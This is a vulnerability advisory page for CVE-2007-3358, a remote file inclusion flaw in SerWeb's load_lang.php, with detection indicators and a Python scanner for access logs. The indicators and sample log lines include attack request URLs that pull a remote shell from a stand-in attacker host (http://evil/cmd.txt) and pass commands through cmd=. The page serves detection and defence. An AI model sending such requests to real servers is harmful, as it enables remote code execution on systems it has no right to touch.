CVE-2007-3358
published 2007-06-22


Priority: P3 (54)
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 68.01% (99.2nd percentile)
PHP remote file inclusion vulnerability in html/load_lang.php in SerWeb 0.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _SERWEB[serwebdir] parameter.

Affected (2 ranges)

Vendor   Product   Version range   Fixed in
iptel    serweb    <= 0.9.6        (none listed)
iptel    serweb    <= 2.0.0dev1    (none listed)

Detection & IOCs (extracted from sources)

  • path: html/load_lang.php
  • url: http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]
  • path: /load_lang.php
  • Monitor HTTP requests to load_lang.php whose _SERWEB[serwebdir] GET parameter carries a URL (http:// or https://); that is the remote file inclusion itself. Match after URL-decoding, since the brackets in the parameter name and the scheme are often percent-encoded (_SERWEB%5Bserwebdir%5D=http%3A%2F%2F...).
  • The exploit appends a trailing '?' and a 'cmd' parameter to the injected shell URL (e.g., ?_SERWEB[serwebdir]=http://evil/cmd.txt?&cmd=<command>). The '?' turns whatever path SerWeb appends to serwebdir into a query string of the attacker's URL, so the shell is fetched unchanged; the combination of a trailing '?' and cmd= is a usable detection pattern in web server logs.
  • The exploit is implemented as a Perl LWP::Simple HTTP client issuing GET requests; look for automated sequential requests to load_lang.php with varying cmd= values from the same source IP (a libwww-perl User-Agent is a supporting, not sufficient, indicator).
  • The vulnerability affects SerWeb 0.9.6 and earlier (including 0.9.4); the exploit targets the publicly available tarball from the iptel.org FTP server.
  • The NVD entry specifies the vulnerable file path as html/load_lang.php, while the exploit targets /load_lang.php directly; the web-accessible path depends on how the html/ directory is mapped in the deployment, so match on the script name rather than a fixed prefix.
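The detection points above, as an added worked example (this is editor-written code, not part of the advisory, the exploit, or SerWeb itself). It parses combined-format access log lines, decodes the query string so percent-encoded variants are caught, matches on the script name regardless of the path prefix, and flags the trailing '?' plus cmd= pattern and repeated distinct cmd= values from one source. The log lines, IP addresses and URLs are constructed sample data. It also goes slightly beyond the page: besides http:// and https:// it treats other PHP stream wrappers usable for remote inclusion (ftp://, php://, data://, expect://) as hits; that wider list is an assumption, not something the sources state.

```python
"""Detect CVE-2007-3358 (SerWeb load_lang.php RFI) attempts in web server access logs."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample log lines (Apache/nginx "combined" format); not real traffic.
# Lines 1-2: RFI attempts, raw and percent-encoded, with the trailing '?' and a cmd= value.
# Line 3: a local directory value, which is not remote inclusion. Line 4: unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jun/2007:10:01:02 +0000] "GET /serweb/html/load_lang.php?_SERWEB[serwebdir]=http://198.51.100.9/cmd.txt?&cmd=id HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [22/Jun/2007:10:01:03 +0000] "GET /load_lang.php?_SERWEB%5Bserwebdir%5D=https%3A%2F%2F198.51.100.9%2Fcmd.txt%3F&cmd=uname%20-a HTTP/1.1" 200 640 "-" "libwww-perl/5.805"
192.0.2.15 - - [22/Jun/2007:10:02:00 +0000] "GET /serweb/html/load_lang.php?_SERWEB[serwebdir]=/var/www/serweb HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.16 - - [22/Jun/2007:10:03:00 +0000] "GET /serweb/html/index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Schemes PHP can include from when allow_url_include is on. The page's pattern is
# http:// or https://; the remaining wrappers are an assumed generalisation.
REMOTE_WRAPPER_RE = re.compile(r"^(?:https?|ftps?|php|data|expect)://", re.IGNORECASE)

INJECTED_PARAM = "_SERWEB[serwebdir]"


def analyse_request(ip, target, user_agent):
    """Return a finding dict if the request looks like load_lang.php RFI exploitation, else None."""
    parsed = urlparse(target)
    # Match on the script name only: deployments expose it as html/load_lang.php or /load_lang.php.
    if not parsed.path.lower().endswith("/load_lang.php"):
        return None
    # parse_qs percent-decodes both keys and values, so _SERWEB%5Bserwebdir%5D is handled too.
    params = parse_qs(parsed.query, keep_blank_values=True)
    values = params.get(INJECTED_PARAM)
    if not values or not REMOTE_WRAPPER_RE.match(values[0]):
        return None
    include_url = values[0]
    return {
        "ip": ip,
        "path": parsed.path,
        "include_url": include_url,
        # A trailing '?' makes any suffix SerWeb appends to serwebdir part of the attacker URL's
        # query string, so the remote shell file is fetched as-is.
        "trailing_query": include_url.endswith("?"),
        "cmd": params.get("cmd", [None])[0],
        "percent_encoded": unquote(parsed.query) != parsed.query,
        "libwww_perl": user_agent.lower().startswith("libwww-perl"),
    }


def scan_log(text):
    """Run analyse_request over every parseable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m["ip"], m["target"], m["ua"])
        if finding:
            findings.append(finding)
    return findings


def automated_sources(findings, min_distinct_cmds=2):
    """Source IPs that sent RFI requests with several distinct cmd= values (sequential automation)."""
    cmds = defaultdict(set)
    for f in findings:
        if f["cmd"] is not None:
            cmds[f["ip"]].add(f["cmd"])
    return {ip for ip, seen in cmds.items() if len(seen) >= min_distinct_cmds}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("automated sources:", automated_sources(hits))
```

Running it against the sample prints two findings for 203.0.113.7 (one raw, one percent-encoded, both with the trailing '?' and a cmd= value) and reports that IP as an automated source; the local-path request on line 3 is correctly ignored because the value is not a remote wrapper.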